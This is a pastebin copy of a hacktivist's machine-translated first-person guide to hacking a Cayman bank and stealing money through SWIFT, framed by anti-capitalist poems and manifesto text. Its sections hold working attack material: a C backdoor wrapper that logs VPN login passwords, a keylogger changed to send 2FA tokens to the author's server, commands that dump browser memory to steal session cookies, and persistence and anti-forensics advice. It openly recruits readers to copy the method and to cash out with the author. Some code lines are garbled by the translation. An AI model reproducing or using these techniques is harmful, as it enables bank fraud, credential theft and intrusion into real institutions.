Advertisement
Guest User

Untitled

a guest
Nov 19th, 2019
8,088
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 63.12 KB | None | 0 0
  1. _ _ _ ____ _ _
  2. | | | | __ _ ___ | | __ | __) __ _ ___ | | _ | |
  3. | | _ | | / _` | / __ | | / / | _ \ / _` | / __ | | / / |
  4. | _ | (_ | | (__ | <| | _) | (_ | | (__ | <| _ |
  5. | _ | | _ | \ __, _ | \ ___ | _ | \ _ \ | ____ / \ __, _ | \ ___ | _ | \ _ (_)
  6.  
  7. A DIY guide to rob banks
  8.  
  9.  
  10. ^ __ ^
  11. (oo) \ _______
  12. ((__) \) \ / \
  13. _) / || ---- w |
  14. (.) / || ||
  15. ''
  16. By Subcowmandante Marcos
  17.  
  18.  
  19.  
  20.  
  21. I am a wild child
  22. Innocent, free, wild
  23. I have all ages
  24. My grandparents live in me
  25.  
  26. I'm brother of the clouds
  27. And I only know how to share
  28. I know everything belongs to everyone
  29. that everything is alive in me
  30.  
  31. My heart is a star
  32. I am a son of the earth
  33. I travel aboard my spirit
  34. Road to eternity
  35.  
  36.  
  37. This is my simple word that seeks to touch the hearts of simple people and
  38. Humble, but also dignified and rebellious. This is my simple word to tell
  39. of my hacks, and to invite other people to hack with cheerful
  40. rebellion.
  41.  
  42. I hacked a bank. I did it to give a liquidity injection, but this time since
  43. below and to the simple and humble people who resist and rebel against
  44. injustices worldwide. In other words: I robbed a bank and gave away the
  45. money. But it wasn't me alone who did it. The free software movement, the
  46. offensive powershell community, metasploit project and hacker community
  47. in general they are the ones that enabled this hacking. The exploit.in community
  48. made it possible to convert intrusion into a bank's computers into cash
  49. and bitcoin The Tor, Qubes and Whonix projects, together with the cryptographers and
  50. activists who defend privacy and anonymity, are my nahuales, is
  51. say, my protectors [1]. They accompany me every night and make it possible for me to stay in
  52. freedom.
  53.  
  54. I did nothing complicated. I only saw the injustice in this world, I felt love
  55. for all beings, and I expressed that love in the best way I could, through
  56. tools that I know how to use. Hate does not move me to banks, nor to the rich, but
  57. a love for life, and the desire for a world where everyone can perform their
  58. potential and live a full life. I would like to explain a little how I see the world,
  59. so they can get an idea of ​​how I came to feel and act like that.
  60. And I also hope that this guide is a recipe that you can follow, combining the
  61. Same ingredients for baking the same cake. Who knows, there you are
  62. such powerful tools end up also serving you to express the
  63. love they feel
  64.  
  65.  
  66. We are all wild children
  67. innocent, free, wild
  68.  
  69. We are all brothers of the trees
  70. children of the earth
  71.  
  72. We just have to put in our heart
  73. a burning star
  74.  
  75. (song by Alberto Kuselman and Chamalú)
  76.  
  77.  
  78. The police will invest a chingo of resources to investigate me. They think the
  79. system works, or at least it will work once they catch all the
  80. "bad boys". I am nothing more than the product of a system that does not work.
  81. As long as there is injustice, exploitation, alienation, violence and
  82. ecological destruction, many more will come like me: an endless series of
  83. people who will reject as illegitimate the bad system responsible for this
  84. suffering. That badly done system is not going to compose by arresting me. I am
  85. only one of the millions of seeds that Tupac planted 238 years ago in La
  86. Peace [2], and I hope that my actions and writings water the seed of rebellion
  87. In their hearts
  88.  
  89. [1] https://es.wikipedia.org/wiki/Cadejo#Origen_y_significado_del_mito
  90. [2] It was before he was killed by the Spaniards, just one day like yesterday, that
  91. He said that "they will only kill me, but tomorrow I will return and I will be millions."
  92.  
  93. ____________________________________________
  94. <To be seen, we cover our faces>
  95. --------------------------------------------
  96. \
  97. \ ^ __ ^
  98. (oo) \ _______
  99. ((__) \) \ / \
  100. _) / || ---- w |
  101. (.) / || ||
  102. ''
  103. To make us listen, hackers sometimes have to cover our faces, because
  104. We are not interested in seeing our face but understanding our word. The
  105. mask can be from Guy Fawkes, Salvador Dalí, from Fsociety, or in some cases
  106. The puppet of a crested toad. By affinity, this time I went to dig up
  107. a deceased to lend me his balaclava. I think then I should clarify that
  108. Sup Marcos is innocent of everything that is told here because, besides being
  109. Dead, I didn't consult him. I hope your ghost, if you find out from a hammock
  110. Chiapaneca, know how to find the goodness to, as they say there, "dismiss this
  111. deep fake "with the same gesture with which an inopportune insect moves away - that's fine
  112. It could be a beetle.
  113.  
  114. Still with the balaclava and the name change, many of those who support my
  115. Actions are perhaps going to pay too much attention to my person. With its own
  116. autonomy shattered for a lifetime of domination, they will be looking for a
  117. leader to follow, or a hero who saves them. But behind the balaclava only
  118. I am a Girl. We are all wild children. We just have to place a star
  119. in chamas em nossos corações.
  120.  
  121.  
  122.  
  123. - [1 - Why expropriate] ----------------------------------------- ------------
  124.  
  125. Capitalism is a system in which a minority has come to appropriate
  126. a vast majority of the world's resources through war, theft and
  127. The explotion. By snatching the commons [1], they forced those below to
  128. being under the control of that minority that owns everything. It is a system
  129. fundamentally incompatible with freedom, equality, democracy and
  130. Sum Qamaña (Good Living). It may sound ridiculous to those of us who have grown up in a
  131. propaganda machinery that taught us that capitalism is freedom, but in
  132. Truly what I say is not a new or controversial idea [2]. The founders
  133. from the United States of America knew they had to choose between creating a
  134. capitalist society, or a free and democratic one. Madison recognized that "the
  135. man who possesses wealth, he who lies on his couch or rolls in his carriage,
  136. cannot judge the wishes or feelings of the day laborer. "But to protect himself
  137. in front of the "spirit of equalization" of the landless day laborers, it seemed
  138. that only landowners should vote, and that the government had to
  139. serve to "protect the opulent minority against the great majority." John
  140. Jay was more to the point and said: "Those who own the country should
  141. rule it. "
  142.  
  143. ____________________________________________________
  144. / There is no such thing as green capitalism. \
  145. | Let's make capitalism history before we |
  146. \ become history. /
  147. -------------------------------------------------- -
  148. \ / \ ___ / \
  149. \ // \ / \ / \\
  150. ((O O))
  151. \\ / \ //
  152. \ / | | \ /
  153. | | | | Evgeny, the great ignored elephant, doesn't understand why everyone
  154. | | | | They pretend not to see you on the panels on climate change, so
  155. | or | Here I give you a chance to say your lines.
  156. | | | |
  157. | m | | m |
  158.  
  159.  
  160. In the same way that bell hooks [3] argues that the rejection of culture
  161. Patriarchal domination is an act in defense of the male interest (already
  162. that emotionally mutilates them and prevents them from feeling love and connection in a way
  163. full), I believe that the culture of domination of capitalism has an effect
  164. similar about the rich, and that they could have fuller and more satisfying lives
  165. if they rejected the class system from which they believe they benefit. For many,
  166. class privilege equals a childhood of emotional neglect, followed
  167. of a life of superficial social interactions and meaningless work. May
  168. that deep down they know that they can only genuinely connect with people
  169. when they work with them as their peers, and not when they put them at their service.
  170. They may know that sharing their material wealth is the best they can do.
  171. with her. You may also know that meaningful experiences,
  172. connections and relationships that count are not the ones that come from
  173. mercantile interactions, but precisely to reject the logic of the market
  174. and give without expecting anything in return. They may know that everything they need to
  175. escape from his prison and live really is to let go, give up control, and
  176. Take a leap of faith. But most lack courage.
  177.  
  178. Then it would be naive of us to direct our efforts to try to
  179. produce some kind of spiritual awakening in the rich [4]. As Assata says
  180. Shakur: "No one in the world, no one in history, has ever achieved his
  181. freedom appealing to the moral sense of its oppressors. "Actually, when
  182. rich people distribute their money, they almost always do it in a way that reinforces the
  183. system that to begin with allowed them to amass their enormous and illegitimate wealth
  184. [5]. And change is unlikely to come through a political process;
  185. As Lucy Parsons says: "Let's never be fooled by the rich
  186. they are going to let them vote to take away their wealth. "Colin Jenkins justifies the
  187. expropriation with these words [6]:
  188.  
  189. Make no mistake, expropriation is not theft. It is not the confiscation of
  190. money earned "with the sweat of the forehead." It is not property theft
  191. private It is, rather, the recovery of huge amounts of land and
  192. wealth that has been forged with stolen natural resources, slavery
  193. human, forced labor force and kneaded in hundreds of years by a
  194. Small minority This wealth ... is illegitimate, both for moral purposes and for
  195. as for the exploitation mechanisms that have been used to create it.
  196.  
  197. For Colin, the first step is that "we have to free ourselves from our bonds
  198. mental (believing that wealth and private property have been earned by
  199. who monopolize them; and that, therefore, they should be something to respect,
  200. reverence, and even something to pursue), open our minds, study and
  201. learn from history, and recognize this illegitimacy together. "Here I leave you
  202. some books that have helped me with this [7] [8] [9] [10] [11].
  203.  
  204. According to Barack Obama, economic inequality is "the challenge that defines our
  205. time. "Computer hacking is a powerful tool to combat
  206. economic inequality. The former director of the NSA, Keith Alexander, agrees
  207. and says that hacking is responsible for "the greatest transfer of wealth of the
  208. history".
  209.  
  210. _________________________
  211. / The story is ours \
  212. And they do it hackers! /
  213. -------------------------
  214. \
  215. \ ^ __ ^
  216. (oo) \ _______
  217. ((__) \) \ / \
  218. _) / || ---- w |
  219. (.) / || ||
  220. ''
  221. Allende present, now and forever!
  222.  
  223. [1] https://sursiendo.com/docs/Pensar_desde_los_comunes_web.pdf
  224. [2] https://chomsky.info/commongood02/
  225. [3] The Will to Change: Men, Masculinity, and Love
  226. [4] his own religion is already very clear about it:
  227. https://dailyverses.net/es/materialismo
  228. [5] https://elpulso.hn/la-filantropia-en-los-tiempos-del-capitalismo/
  229. [6] http://www.hamptoninstitution.org/expropriation-or-bust.html
  230. [7] Manifesto for a Democratic Civilization. Volume 1, Civilization: The Era
  231. of the Masked Gods and the Covered Kings
  232. [8] Caliban and the Witch
  233. [9] In debt: An alternative history of the economy
  234. [10] The other story of the United States
  235. [11] The open veins of Latin America
  236.  
  237.  
  238.  
  239. _________________________________
  240. <Our weapon is our keyboard>
  241. ---------------------------------
  242. \
  243. \ ^ __ ^
  244. (oo) \ _______
  245. ((__) \) \ / \
  246. _) / || ---- w |
  247. (.) / || ||
  248. `` ^^ ^^
  249.  
  250. - [2 - Introduction] ------------------------------------------- ---------------
  251.  
  252. This guide explains how I hacked the Cayman Bank and Trust Company
  253. (Isle of Man). Why am I publishing this, almost four years later?
  254.  
  255. 1) To show what is possible
  256.  
  257. Hackers working for social change have limited themselves to developing
  258. security and privacy tools, DDoS, perform defaults and leaks.
  259. Wherever you go there are radical projects for a complete social change
  260. state of precariousness, and they could do a lot with some money
  261. expropriated At least for the working class, bank robbery is something
  262. socially accepted, and those who do are seen as heroes of the people. In
  263. the digital age, robbing a bank is a non-violent, less risky act, and the
  264. Reward is greater than ever. So why are only hackers from
  265. black hat that they do for their personal benefit, and never
  266. hacktivists to finance radical projects? Maybe they don't think they are
  267. able to do it The big bank hacks come out on the news every
  268. as much as the hacking to the Bank of Bangladesh [1], which was attributed to Korea's
  269. North, or the hacks to banks attributed to the Carbanak group [2], which they describe
  270. as a very large and well organized group of Russian hackers, with different
  271. members who would be specialized in different tasks. And, well it's not so
  272. complicated.
  273.  
  274. It is because of our collective belief that the financial system is unquestionable
  275. that we exercise control over ourselves, and maintain the class system
  276. without those above having to do anything [3]. Be able to see how vulnerable and
  277. fragile is actually the financial system helps us break that hallucination
  278. collective That is why banks have a strong incentive not to report the
  279. hacks, and to exaggerate how sophisticated the attackers are. None of the
  280. financial hacks that I did, or of which I have known, has never been reported.
  281. This is going to be the first, and not because the bank would like to, but because I
  282. I decided to publish it.
  283.  
  284. As you are about to learn in this homemade guide, hack a bank and
  285. transferring money through the SWIFT network does not require the support of any
  286. government, nor of a large and specialized group. It is something totally possible
  287. being a mere amateur hacker and heap, with just tools
  288. public and basic knowledge of how to write a script.
  289.  
  290. [1] https://elpais.com/economia/2016/03/17/actualidad/1458200294_374693.html
  291. [2] https://securelist.lat/el-gran-robo-de-banco-el-apt-carbanak/67508/
  292. [3] https://es.wikipedia.org/wiki/Hegemon%C3%ADa_cultural
  293.  
  294. 2) Help withdraw cash
  295.  
  296. Many of those who read this already have, or with a little study are going to be
  297. able to acquire the necessary skills to carry out a hacking
  298. like this. However, many will find that they lack the
  299. criminal connections necessary to get the handles in condition. In Myself
  300. case, this was the first bank that hacked, and at that time I only had a few
  301. few and mediocre accounts prepared to withdraw cash (known
  302. as bank drops), so it was only a few hundred thousand who
  303. I was able to withdraw in total, when it is normal to get millions. Now instead
  304. that I have the knowledge and connections to get cash more seriously, from
  305. so if they are hacking a bank but they need help to convert
  306. that in real money, and they want to use that wool to finance projects
  307. radical social, contact me.
  308.  
  309. 3) Collaborate
  310.  
  311. It is possible to hack banks as an amateur who works alone, but the
  312. It is clear that, in general, it is not as easy as I paint it here. I was lucky with
  313. This bank for several reasons:
  314.  
  315. 1) It was a small bank, so it took me much less time to get to
  316. Understand how everything worked.
  317.  
  318. 2) They had no procedure to check the sent swift messages.
  319. Many banks have one, and you need to write code to hide your
  320. transfers from your monitoring system.
  321.  
  322. 3) They only used password authentication to access the application with the
  323. that connected to the SWIFT network. Most banks now use RSA
  324. SecurID, or some form of 2FA. You can skip this by writing code to
  325. receive an alert when they enter your token, and thus be able to use it before
  326. expire It's simpler than it seems: I've used Get-Keystrokes [1],
  327. modifying it so that instead of storing the pressed keys, a
  328. GET request to my server every time it is detected that they have entered a
  329. Username. This request adds the username to the url and,
  330. as they type the token, several GETs are made with the token digits
  331. concatenated to the url. On my side I leave this running in the meantime:
  332.  
  333. ssh yo @ my_secret_server 'tail -f / var / log / apache2 / access_log'
  334. | while read i; I miss $ i; aplay alarm.wav &> / dev / null; done
  335.  
  336. If it is a web application, you can skip the 2FA by stealing the cookie
  337. after they have authenticated. I am not an APT with a team of coders
  338. That can make me custom tools. I am a simple person who lives
  339. of what terminal [2] gives, so what I use is:
  340.  
  341. procdump64 / accepteula -r -ma PID_del_browser
  342. strings64 / accepteula * .dmp | findstr PHPSESSID 2> nul
  343.  
  344. or going through findstr rather than strings, which makes it much more
  345. Quick:
  346.  
  347. findstr PHPSESSID * .dmp> tmp
  348. strings64 / accepteula tmp | findstr PHPSESSID 2> nul
  349.  
  350. Another way to skip it is to access your session with a hidden VNC (hvnc)
  351. after they have authenticated, or with a little creativity too
  352. you could focus on another part of your process instead of sending messages
  353. SWIFT directly.
  354.  
  355. I think that if I collaborated with other experienced bank hackers we could
  356. make hundreds of banks like Carnabak, instead of doing one of those
  357. in both on my own. So if you have experience with similar hacks and
  358. You want to collaborate, contact me. You will find my email and my PGP key at the end of
  359. the previous guide [3].
  360.  
  361. [1] https://github.com/PowerShellMafia/PowerSploit/blob/master/
  362. Exfiltration / Get-Keystrokes.ps1
  363. [2] https://lolbas-project.github.io/
  364. [3] https://www.exploit-db.com/papers/41914
  365.  
  366. ________________________________________
  367. / If robbing a bank would change things, \
  368. \ would make it illegal /
  369. ----------------------------------------
  370. \
  371. \ ^ __ ^
  372. (oo) \ _______
  373. ((__) \) \ / \
  374. _) / || ---- w |
  375. (.) / || ||
  376. ''
  377.  
  378. - [3 - Be careful out there] ---------------------------------------- ------
  379.  
  380. It is important to take some simple precautions. I'm going to refer to this
  381. same section of my last guide [1], since apparently it works just fine
  382. [2]. All I have to add is that, in Trump's words, "Unless
  383. catch hackers in fraganti, it is difficult to determine who is that
  384. I was hacking, "so the police are getting more and more
  385. creative [3] [4] in their attempts to grab criminals on the spot (when
  386. your encrypted hard drives are unlocked). So it would be nice if by
  387. example you carry a certain bluetooth device and configure your
  388. computer to shut down when it moves beyond a certain range, or
  389. when an accelerometer detects movement, or something like that.
  390.  
  391. You may write long articles detailing your actions and your ideology not
  392. it's the safest thing in the world (ups!), but at times I feel I had to
  393. do what.
  394.  
  395. If I didn't believe in who listens to me
  396. If I didn't believe in what hurts
  397. If I didn't believe in what's left
  398. If I didn't believe in what I fought
  399. What a thing ...
  400. What was the club without a quarry?
  401.  
  402. [1] https://www.exploit-db.com/papers/41914
  403. [2] https://www.wifi-libre.com/topic-1268-italia-se-rinde-y-deja-de-buscar-a-
  404. phineas-fisher.html
  405. [3] https://www.wired.com/2015/05/silk-road-2/
  406. [4] https://motherboard.vice.com/en_us/article/59wwxx/fbi-airs-alexandre-cazes-
  407. alphabay-arrest-video
  408.  
  409.  
  410. , - \ __
  411. | f- "Y \ ____________________
  412. \ () 7L / | Be gay! |
  413. cgD | Do the crime! | __ _
  414. | \ (---------------------. 'Y'>,
  415. \ \ \ / _ _ \
  416. \\\ \) (_) (_) (|}
  417. \\\ {4A} /
  418. \\\ \ uLuJJ / \ l
  419. \\\ | 3 p) /
  420. \\\ ___ __________ / nnm_n //
  421. c7 ___-__, __-) \, __) (". \ _> - <_ / D
  422. // V \ _ "-._.__ G G_c __.-__ <" / (\
  423. <"-._> __-, G _.___) \ \ 7 \
  424. ("-.__. | \" <.__.- ") \ \
  425. | "-.__" \ | "-.__.-". \ \ \
  426. ("-.__" ". \" -.__.- ". | \ _ \
  427. \ "-.__" "|! |" -.__.- ".) \ \
  428. "-.__" "\ _ |" -.__.- "./ \ l
  429. ".__" ""> G> -.__.- "> .--, _
  430. "" G
  431.  
  432. Many blame queer people for the decline of this society;
  433. we are proud of it
  434. Some believe we want to reduce to ashes
  435. this civilization and its moral fabric;
  436. They couldn't be more right
  437. They often describe us as depravadxs, decadent and revoltosxs
  438. But alas! They haven't seen anything yet
  439.  
  440. https://theanarchistlibrary.org/library/mary-nardini-gang-be-gay-do-crime
  441.  
  442.  
  443. - [4 - Get access] ------------------------------------------ ------------
  444.  
  445. In another place [1] I talked about the main ways to get
  446. Initial access to a company's network during a targeted attack. But nevertheless,
  447. This was not a targeted attack. I didn't set out to hack a specific bank, what
  448. I wanted to hack any bank, which ends up being a lot of homework
  449. more simple This type of nonspecific approach was popularized by Lulzsec and
  450. Anonymous [2]. As part of [1], I prepared an exploit and tools for
  451. post-exploitation for a popular VPN device. Then I started scanning the
  452. entire internet with zmap [3] and zgrab to identify other devices
  453. vulnerable I had the scanner save the vulnerable IPs, along with the
  454. "common name" and "alt names" of the device's SSL certificate, the names
  455. Windows domain of the device, and reverse DNS lookup of the IP. You
  456. I did a grep to the result in search of the word "bank", and there was enough to
  457. choose, but the truth is that the word "Cayman" attracted me, and that is how I came
  458. to stay with this one.
  459.  
  460. [1] https://www.exploit-db.com/papers/41914
  461. [2] https://web.archive.org/web/20190329001614/http://infosuck.org/0x0098.png
  462. [3] https://github.com/zmap/zmap
  463.  
  464.  
  465. ---- [4.1 - The Exploit] ---------------------------------------- ----------------
  466.  
  467. When I published my latest DIY guide [1] I didn't reveal the exploit details of
  468. sonicwall that he had used to hack Hacking Team, since it was very useful for
  469. other hacks, like this one, and I still hadn't finished having fun with him.
  470. Determined then to hack Hacking Team, I spent weeks doing engineering
  471. Reverse to his sonicwall ssl-vpn model, and I even managed to find
  472. several memory corruption vulnerabilities more or less difficult to
  473. explode, before I realized that the device was easily exploitable
  474. with shellshock [2]. When shellshock came out, many sonicwall devices were
  475. vulnerable, only with a request to cgi-bin / welcome, and a payload in the
  476. user-agent Dell released a security update and an advisory for these
  477. versions. The version used by Hacking Team and this bank had the version of
  478. bash vulnerable, but cgi requests didn't fire the shellshock except for
  479. the requests to a shell script, and there was just one accessible:
  480. cgi-bin / jarrewrite.sh. This seems to have escaped Dell's in his note,
  481. since they never released a security update or an advisory for that
  482. sonicwall version. And, kindly, Dell had done twounix setuid root,
  483. leaving an easy device to root.
  484.  
  485. In my last guide many read that I spent weeks researching a device
  486. until they found an exploit, and they assumed that meant that I was some kind
  487. of elite hacker. The reality, that is, the fact that it took me two weeks
  488. realize that it was trivially exploitable with shellshock, maybe less
  489. Flattering to me, but I think it's also more inspiring. Show that
  490. You can really do this for yourself. You don't need to be a genius, I
  491. I certainly am not. Actually my work against Hacking Team started a
  492. year before When I discovered Hacking Team and the Gamma Group in the
  493. CitizenLab research [3] [4], I decided to explore a bit and see if I could
  494. find something. I didn't get anywhere with Hacking Team, but I was lucky with
  495. Gamma Group, and I was able to hack your customer support portal with sql injection
  496. Basic and file upload vulnerabilities [5] [6]. However, despite
  497. that its support server gave me a pivot towards the internal Gamma network
  498. Group, I was unable to penetrate beyond the company. from this one on
  499. experience with the Gamma Group and other hacks, I realized that I was
  500. really limited by my lack of knowledge about privilege escalation and
  501. lateral movement in windows domains, active directory and windows in general.
  502. So I studied and practiced (see section 11), until I felt I was ready
  503. to return to visit Hacking Team almost a year later. The practice
  504. paid off, and this time I was able to make a complete commitment to the
  505. company [7]. Before I realized that I could go in with shellshock, I was
  506. willing to spend happy whole months of life studying development of
  507. exploits and writing a reliable exploit for one of the vulnerabilities of
  508. Memory corruption I had found. I just knew that Hacking Team
  509. I needed to be exposed, and it would take as much time as necessary and
  510. I would learn what I had to learn to get it. To perform these
  511. Hacks you don't need to be bright. You don't even need great knowledge
  512. technical. You just need dedication, and believe in yourself.
  513.  
  514. [1] https://www.exploit-db.com/papers/41914
  515. [2] https://es.wikipedia.org/wiki/Shellshock_(error_de_software)
  516. [3] https://citizenlab.ca/tag/hacking-team/
  517. [4] https://citizenlab.ca/tag/finfisher/
  518. [5] https://theintercept.com/2014/08/07/leaked-files-german-spy-company-helped-
  519. bahrain-track-arab-spring-protesters /
  520. [6] https://www.exploit-db.com/papers/41913
  521. [7] https://web.archive.org/web/20150706095436/https://twitter.com/hackingteam
  522.  
  523.  
  524. ---- [4.2 - The Backdoor] ---------------------------------------- ---------------
  525.  
  526. Part of the backdoor that I prepared for Hacking Team (see [1], section 6) was a
  527. Simple wrapper on the login page to capture passwords:
  528.  
  529. #include <stdio.h>
  530. #include <unistd.h>
  531. #include <fcntl.h>
  532. #include <string.h>
  533. #include <stdlib.h>
  534.  
  535. int main ()
  536. {
  537. char buf [2048];
  538. int nread, pfile;
  539.  
  540. / * pull the log if we send a special cookie * /
  541. char * cookies = getenv ("HTTP_COOKIE");
  542. if (cookies && strstr (cookies, "our private password")) {
  543. write (1, "Content-type: text / plain \ n \ n", 26);
  544. pfile = open ("/ tmp / .pfile", O_RDONLY);
  545. while ((nread = read (pfile, buf, sizeof (buf)))> 0)
  546. write (1, buf, nread);
  547. exit (0);
  548. }
  549.  
  550. / * the principal stores the POST data and sends it to the child,
  551. what is the real login program * /
  552. int fd [2];
  553. pipe (fd);
  554. pfile = open ("/ tmp / .pfile", O_APPEND | O_CREAT | O_WRONLY, 0600);
  555. if (fork ()) {
  556. close (fd [0]);
  557.  
  558. while ((nread = read (0, buf, sizeof (buf)))> 0) {
  559. write (fd [1], buf, nread);
  560. write (pfile, buf, nread);
  561. }
  562.  
  563. write (pfile, "\ n", 1);
  564. close (fd [1]);
  565. close (pfile);
  566. wait (NULL);
  567. } else {
  568. close (fd [1]);
  569. dup2 (fd [0], 0);
  570. close (fd [0]);
  571. execl ("/ usr / src / EasyAccess / www / cgi-bin / .userLogin",
  572. "userLogin", NULL);
  573. }
  574. }
  575.  
  576. In the case of Hacking Team, they logged into the VPN with single-use passwords,
  577. so the VPN gave me access only to the network, and from there it took me
  578. An extra effort to get domain admin on your network. In the other guide I wrote
  579. on lateral passes and privilege escalation in windows domains [1]. In this
  580. case, however, it was the same windows domain passwords that were
  581. they used to authenticate against the VPN, so I could get a good
  582. User passwords, including the domain admin. Now I had total
  583. access to your network, but usually this is the easy part. The most complicated part
  584. is to understand how they operate and how to get the gun.
  585.  
  586. [1] https://www.exploit-db.com/papers/41914
  587.  
  588.  
  589. ---- [4.3 - Fun facts] ---------------------------------------- ------------
  590.  
  591. Following the investigation they did about the hacking, I found it interesting
  592. see that, by the same time I did it, the bank could have been
  593. committed by someone else through a targeted phishing email [1].
  594. As the old saying goes, "give a person an exploit and they will have access by a
  595. day, teach phishear and he will have access all his life "[2]. The fact that
  596. someone else, by chance and at the same time as me, put on this bank
  597. small in the sights (they registered a domain similar to the real domain of the bank
  598. to be able to send phishing from there) suggests that bank hacks
  599. They occur much more frequently than is known.
  600.  
  601. A fun suggestion so you can follow your research
  602. hacking is having a backup access, one that you won't touch unless
  603. lose normal access I have a simple script that expects commands a
  604. once a day, or less, just to maintain long-term access in the case of
  605. that block my regular access. Then I had an empire powershell [3]
  606. calling home more frequently to a different IP, and used empire to
  607. launch meterpreter [4] against a third IP, where he performed most of
  608. my job. When PWC started investigating the hacking, they found my use of
  609. empire and meterpreter and cleaned those computers and blocked those IPs, but
  610. They did not detect my backup access. PWC had placed devices
  611. network monitoring, to be able to analyze the traffic and see if there was still
  612. infected computers, so I didn't want to connect much to their network. Alone
  613. I launched mimikatz once to get the new passwords, and from there
  614. I was able to continue your research by reading your emails in the outlook web access.
  615.  
  616. [1] page 47, Project Pallid Nutmeg.pdf, in torrent
  617. [2] https://twitter.com/thegrugq/status/563964286783877121
  618. [3] https://github.com/EmpireProject/Empire
  619. [4] https://github.com/rapid7/metasploit-framework
  620.  
  621.  
  622. - [5 - Understand Banking Operations] ------------------------------------
  623.  
  624. To understand how the bank operated, and how I could get money, I followed the
  625. techniques that I summarized in [1], in section "13.3 - Internal Recognition".
  626. I downloaded a list of all file names, I did a grep in search
  627. of words like "SWIFT" and "transfer", and I downloaded and read all the
  628. Files with interesting names. I also looked for emails from employees, but from
  629. by far the most useful technique was to use keyloggers and screenshots to
  630. observe how the bank employees worked. I didn't know it by then, but
  631. For this windows brings a very good monitoring tool [2]. How I know
  632. described in technique no. 5 of section 13.3 in [1], I captured the
  633. keys pressed throughout the domain (including window titles), I made a
  634. grep in search of SWIFT, and I found some employees opening 'SWIFT Access
  635. Service Bureau - Logon '. For those employees, I ran meterpreter as in [3], and
  636. I used the post / windows / gather / screen_spy module to take screenshots
  637. every 5 seconds, to see how they worked. They were using an app
  638. remote citrix of the bottomline company [4] to access the SWIFT network, where
  639. Each payment message SWIFT MT103 had to go through three employees: one
  640. to "create" the message, one to "verify it", and another to "authorize it". How
  641. I already had all his credentials thanks to the keylogger, I could perform with
  642. Ease the three steps myself. And from what I knew after seeing them
  643. work, they didn't check the sent SWIFT messages, so you should have
  644. enough time to get the money from my bank drops before the bank
  645. He would realize and try to reverse the transfers.
  646.  
  647. [1] https://www.exploit-db.com/papers/41914
  648. [2] https://cyberarms.wordpress.com/2016/02/13/using-problem-steps-recorder-psr-
  649. remotely-with-metasploit /
  650. [3] https://www.trustedsec.com/blog/no_psexec_needed/
  651. [4] https://www.bottomline.com/uk/products/bottomline-swift-access-services
  652.  
  653. _________________________________________
  654. / Who steals a thief, is one hundred years old \
  655. \ sorry /
  656. -----------------------------------------
  657. \
  658. \ ^ __ ^
  659. (oo) \ _______
  660. ((__) \) \ / \
  661. _) / || ---- w |
  662. (.) / || ||
  663. ''
  664.  
  665. - [6 - Send money] ----------------------------------------- -------------
  666.  
  667. I had no idea what I was doing, so I was discovering
  668. by the way. Somehow, the first transfers I sent came out
  669. well. The next day, I screwed up by sending a transfer to Mexico that put
  670. End to my fun. This bank sent its international transfers
  671. through your correspondent account in Natwest. I had seen the bill
  672. correspondent for transfers in pounds sterling (GBP) appeared as
  673. NWBKGB2LGPL, while for the others it was NWBKGB2LXXX. The transference
  674. Mexican was in GBP, so I assumed that I had to put NWBKGB2LGPL as
  675. correspondent. If I had prepared it better I would have known that the GPL instead of
  676. XXX indicated that the payment would be sent through the Fast Payment Service of the
  677. United Kingdom, rather than as an international transfer, which obviously
  678. Well, it won't work when you're trying to send money to Mexico. So
  679. The bank received an error message. The same day I also tried to send a
  680. Payment of £ 200k to UK using NWBKGB2LGPL, which was not made because 200k exceeded the
  681. shipping limit by fast payments, and would have had to use NWBKGB2LXXX in
  682. time. They also received an error message for this. They read the messages, what
  683. They investigated, and found the rest of my transfers.
  684.  
  685.  
  686. - [7 - The loot] ------------------------------------------ --------------------
  687.  
  688. From what I write, a complete idea of ​​what my ideals are and
  689. What things I give my support. But I don't want to see anyone in legal trouble
  690. for receiving expropriated funds, so not another word of where to go
  691. It was the wool. I know journalists are probably going to want to put some
  692. number about how many dollars were distributed in this hack and others
  693. similar, but I prefer not to encourage our perverse habit of measuring
  694. actions just for their economic value. Any action is admirable if
  695. It comes from love and not from the ego. Unfortunately those above, the rich and
  696. powerful, public figures, businessmen, people in positions
  697. "important", those that our society respects and values ​​most, those have
  698. placed where they are based on acting more from the ego than from love. Is in
  699. the simple, humble and "invisible" people we should look at and
  700. Who should we admire?
  701.  
  702.  
  703. - [8 - Cryptocurrencies] ------------------------------------------- --------------
  704.  
  705. Redistribute expropriated money to Chilean projects that seek social change
  706. positive would be easier and safer if those projects accepted donations
  707. anonymous via cryptocurrencies like monero, zcash, or at least bitcoin. It is understood
  708. that many of these projects have an aversion to cryptocurrencies, since
  709. they look more like some strange hypercapitalist dystopia than the economy
  710. social with which we dream. I share their skepticism, but I think they turn out
  711. useful to allow donations and anonymous transactions, by limiting the
  712. Government surveillance and control. Same as cash, whose use many
  713. Countries are trying to limit for the same reason.
  714.  
  715.  
  716. - [9 - Powershell] ------------------------------------------- -----------------
  717.  
  718. In this operation, as in [1], I made a lot of use of powershell. By
  719. so, powershell was super cool, you could do almost anything that
  720. you would like, without antivirus detection and with very little forensic footprint. It happens
  721. that with the introduction of AMSI [2] the offensive powershell is retiring.
  722. Today the C # offensive is what is on the rise, with tools like
  723. [3] [4] [5] [6]. AMSI is going to get to .NET for 4.8, so to the tools in
  724. C # probably still have a couple of years left before they become outdated.
  725. And then we'll use C or C ++ again, or maybe Delphi gets back on
  726. fashion. The specific tools and techniques change every few years, but in
  727. the bottom line is not so much what changes, today hacking is essentially still the
  728. Same thing it was in the 90s. In fact all powershell scripts
  729. employees in this guide and in the previous one [1] are still perfectly usable
  730. today, after a small obfuscation of your own harvest.
  731.  
  732. [1] https://www.exploit-db.com/papers/41914
  733. [2] https://medium.com/@byte_St0rm/
  734. adventures-in-the-wonderful-world-of-amsi-25d235eb749c
  735. [3] https://cobbr.io/SharpSploit.html
  736. [4] https://github.com/tevora-threat/SharpView
  737. [5] https://www.harmj0y.net/blog/redteaming/ghostpack/
  738. [6] https://rastamouse.me/2019/08/covenant-donut-tikitorch/
  739.  
  740. ___________________________
  741. / Fo Sostyn, Fo Ordaag \
  742. \ Financial Sector Fuck Off /
  743. ---------------------------
  744. \
  745. \ ^ __ ^
  746. (oo) \ _______
  747. ((__) \) \ / \
  748. _) / || ---- w |
  749. (.) / || ||
  750. ''
  751.  
  752. - [10 - Torrent] ------------------------------------------- -------------------
  753.  
  754. Privacy for the weak, transparency for the powerful.
  755.  
  756. Offshore banking provides privacy to its own government to
  757. executives, politicians and millionaires. Exposing them may sound
  758. hypocritical of me, since I am generally in favor of privacy and
